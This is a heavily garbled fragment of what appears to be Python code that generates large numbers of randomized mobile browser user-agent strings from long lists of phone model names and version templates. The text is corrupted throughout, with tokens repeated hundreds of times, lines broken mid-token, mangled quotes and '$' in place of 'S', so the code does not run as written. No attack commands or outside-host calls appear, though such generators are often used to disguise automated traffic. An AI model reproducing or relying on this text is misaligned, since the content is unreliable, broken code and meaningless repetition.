D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5830D';GT-S5850D';GT-S5850D';GT-S5850D';GT-S5850D';GT-S5850D';GT-S5850D';GT-S5850D';GT-S5850D';GT-S5850D';GT-S5
   S5830i',GT-S5830L',GT-S5830M',GT-S5830T',GT-S5830V',GT-S5831i',GT-S5838',GT-S5839i',GT-S6010',GT-S6010BBABTU',GT-S6012',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',GT-S6012B',G
  $6102',GT-$6102B',GT-$6293T',GT-$6310B',GT-$6310ZWAMID',GT-$6312',GT-$6313T',GT-$6352',GT-$6500',GT-$6500D',GT-$6500L',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$679
   S6790L';GT-S6790N';GT-S6792L';GT-S6800';GT-S6800HKAXFA';GT-S6802';GT-S6810D';GT-S6810B';GT-S6810E';GT-S6810L';GT-S6810M';GT-
   S6810MBASER',GT-S6810P',GT-S6812',GT-S6812B',GT-S6812C',GT-S6812i',GT-S6818',GT-S6818V',GT-S7230E',GT-S7233E',GT-S7250D',GT-S7262',GT-S7262',GT-S726818V',GT-S7230E',GT-S7230E',GT-S7250D',GT-S7262',GT-S726818V',GT-S7230E',GT-S7230E',GT-S7250D',GT-S726818V',GT-S7230E',GT-S7230E',GT-S7250D',GT-S726818V',GT-S7230E',GT-S7230E',GT-S7250D',GT-S726818V',GT-S7230E',GT-S7230E',GT-S7250D',GT-S7250D',GT-S726818V',GT-S7230E',GT-S7230E',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT-S7250D',GT
   $7270';GT-$7270L';GT-$7272C';GT-$7273T';GT-$7278L';GT-$7278U';GT-$7390G';GT-$7390L';GT-$7390L';GT-$7392L';GT-$7392L';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500';GT-$7500'
   S7500ABABTU','GT-S7500ABADBT','GT-S7500ABTTLP','GT-S7500CWADBT','GT-S7500L','GT-S7500T','GT-S7560','GT-S7560M','GT-S7562','GT-S7562C','GT-S7500ABADBT','GT-S7500ABADBT','GT-S7500ABADBT','GT-S7500ABADBT','GT-S7500ABADBT',
  $7562i','GT-$7566','GT-$7566','GT-$7568','GT-$7568','GT-$7568i','GT-$7572','GT-$7580E','GT-$7588T','GT-$7588X','GT-$7592','GT-$7710','GT-$7710','GT-$77898','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681','GT-$7681
  $7898I',GT-$8500',GT-$8500',GT-$8600',GT-$TB919',GT-T140',GT-T150',GT-V8a',GT-V818',GT-VC818',GT-VM919$',GT-W131',GT-W153',GT-X831',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W153',GT-W15
   X853'.'GT-X870'.'GT-X890'.'GT-Y8750']
           strvoppo = f"Mozilla/5.0 (Linux; Android {str(rr(1,11))}; {str(rc(oppo))} Build/{str(rc(lonte))}) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
   Chrome/{str(rr(10,107))}.0.{str(rr(111,6666))}.{str(rr(10,400))}.UCBrowser/{str(rr(1,20))}.{str(rr(1,10))}.0.{str(rr(111,5555))}.Mobile Safari/537.36
   OPR/{str(rr(10,80))}.{str(rr(1,10))}.{str(rr(111,5555))}.{str(rr(111,99999))}"
            strvredmi = f"Mozilla/5.0 (Linux; Android {str(rr(1,11))}; {str(rc(redmi))}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{str(rr(10,107))}.0.
   {str(rr(111,6666))}.{str(rr(10,400))} Mobile Safari/537.36"
            strvoppo1 = f"Mozilla/5.0 (Linux; Android {str(rr(1,11))}; {str(rc(oppo))}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{str(rr(10,107))}.0.
    {str(rr(111,6666))}.{str(rr(10,400))} Mobile Safari/537.36"
           strvinfinix = f"Mozilla/5.0 (Linux; Android {str(rr(1,11))}; Infinix {str(rc(infinix))}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{str(rr(10,107))}.0.
   {str(rr(111,6666))}.{str(rr(10,400))} Mobile Safari/537.36"
           strvsamsung = f"Mozilla/5.0 (Linux; Android {str(rr(1,11))}; {str(rc(samsung))}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{str(rr(10,107))}.0.
   {str(rr(111,6666))}.{str(rr(10,400))} Mobile Safari/537.36"
           strvredmi1 = f"Mozilla/5.0 (Linux; Android {str(rr(1,11))}; {str(rc(redmi))} Build/{str(rc(lonte))}) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
   Chrome/\{str(rr(10,107))\}.0.\{str(rr(111,6666))\}.\{str(rr(10,400))\}.UCBrowser/\{str(rr(1,20))\}.\{str(rr(1,10))\}.0.\{str(rr(111,5555))\}.(str(rr(111,5555))\}.(str(rr(111,5555))\}.(str(rr(111,5555))\}.(str(rr(111,5555))\}.(str(rr(111,5555))\}.(str(rr(111,5555))\}.(str(rr(111,5555))\}.(str(rr(111,5555))\}.(str(rr(111,5555)))\}.(str(rr(111,5555)))\}.(str(rr(111,5555)))\}.(str(rr(111,5555)))\}.(str(rr(111,5555)))\}.(str(rr(111,5555)))\}.(str(rr(111,5555)))\}.(str(rr(111,5555)))\}.(str(rr(111,5555)))\}.(str(rr(111,5555)))\}.(str(rr(111,5555)))\}.(str(rr(111,5555)))\}.(str(rr(111,5555)))\}.(str(rr(111,5555)))\}.(str(rr(111,5555)))\}.(str(rr(111,5555)))\}.(str(rr(111,5555)))
  OPR/{str(rr(10,80))}.{str(rr(1,10))}.{str(rr(111,5555))}.{str(rr(111,99999))}
           strynokiax = f"Mozilla/5.0 (Linux; Android 4.1.2; Nokia_X Build/{str(rc(build_nokiax))}) AppleWebKit/537.36 (KHTML, like Gecko)
   Chrome/{str(rr(100,104))}.0.\str(rr(3900,4900))}.(str(rr(40,150))) Mobile Safari/537.36 NokiaBrowser/7.(str(rr(1,5))).1.(str(rr(16,37))) {str(rc(aZ))}
   {str(rr(1,1000))}
           strvgt = f"Mozilla/5.0 (Linux; Android {str(rr(4,12))}; {str(rc(gt))}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{str(rr(100,104))}.0.
   {str(rr(3900,4900))}.{str(rr(40,150))} Mobile Safari/537.36 {str(rc(aZ))}{str(rr(1,1000))}"
           uateddy = random.choice([strvoppo, strvredmi,strvoppo1, strvinfinix, strvsamsung, strvredmi1, strvnokiax, strvgt])
           ugen.append(uateddy)
  for xd in range(10000):
  a='Mozilla/5.0 (Symbian/3; Series60/'
  b=random.randrange(1, 9)
  c=random.randrange(1, 9)
  d='Nokia'
  e=random.randrange(100, 9999)
   f='/110.021.0028; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/535.1 (KHTML, like Gecko) NokiaBrowser/
  g=random.randrange(1, 9)
  h=random.randrange(1, 4)
  i=random.randrange(1, 4)
  j=random.randrange(1, 4)
   k='Mobile Safari/535.1'
  uaku=(f'{a}{b}.{c}{d}{e}{f}{g}.{h}.{i}.{j}{k}')
   ugen.append(uaku)
   aa='Mozilla/5.0 (Linux; U; Android'
  b=random.choice(['6',7',8',9',10',11',12'])
   c=' en-us; GT-'
  d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
  e=random.randrange(1, 999)
  f=random.choice([A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
   g='AppleWebKit/537.36 (KHTML, like Gecko) Chrome/
  h=random.randrange(73,100)
  j=random.randrange(4200,4900)
    k=random.randrange(40,150)
  l='Mobile Safari/537.36'
  uaku2=f'{aa}{b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k}{l}'
  ugen.append(uaku2)
  for xd in range(3000):
  build_nokiax = ['JDQ39','JZO54K']
  rr = random.randint; rc = random.choice
 miui_v3 = [-g',-gn',-go',-gn',gzip(gfe)', swan-mibrowser']
miui_v1 = [0',1',2',3',4',5',6',7',8',9',10',11',12']
miu_v1 = [0,1,2,3,4,3,0,7,6,7,10,11,12]

miu_v2 = [0',1,'2',3',4',5',6',7',8',9',10',11',14',22',27',36']

aZ = [A',B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']

basa = ['en-us',en-gb',id-id','de-de','ru-ru',en-sg','fr-fr','fa-ir','ja-jp',pt-br',cs-cz','zh-hk',zh-cn','vi-vn',en-ph',en-in','tr-tr']
  gt = ['GT-1015','GT-1020','GT-1030','GT-1035','GT-1040','GT-1045','GT-1050','GT-1240','GT-1440','GT-1450','GT-18190','GT-18262','GT-19060l','GT-19082','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l','GT-19060l'
    19083','GT-19105','GT-19152','GT-19192','GT-19300','GT-19505','GT-2000','GT-2000','GT-200s','GT-3000','GT-414X0P','GT-6918','GT-7010','GT-7020','GT-
  7030';GT-7040';GT-7050';GT-7100';GT-7105';GT-7110';GT-7205';GT-7210';GT-7240R';GT-7245';GT-7303';GT-7310';GT-7320';GT-7325';GT-7325';GT-7326';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-7325';GT-735';GT-735';GT-735';GT-735';GT-735';GT-735';GT-735';GT-735';GT-735';GT-735';GT-735';GT-735';GT-735';
   7340';GT-7405';GT-7550 5GT-8005';GT-8010';GT-81';GT-810';GT-8105';GT-8110';GT-8220S';GT-8410';GT-9300';GT-9320';GT-93G';GT-A7100';GT-
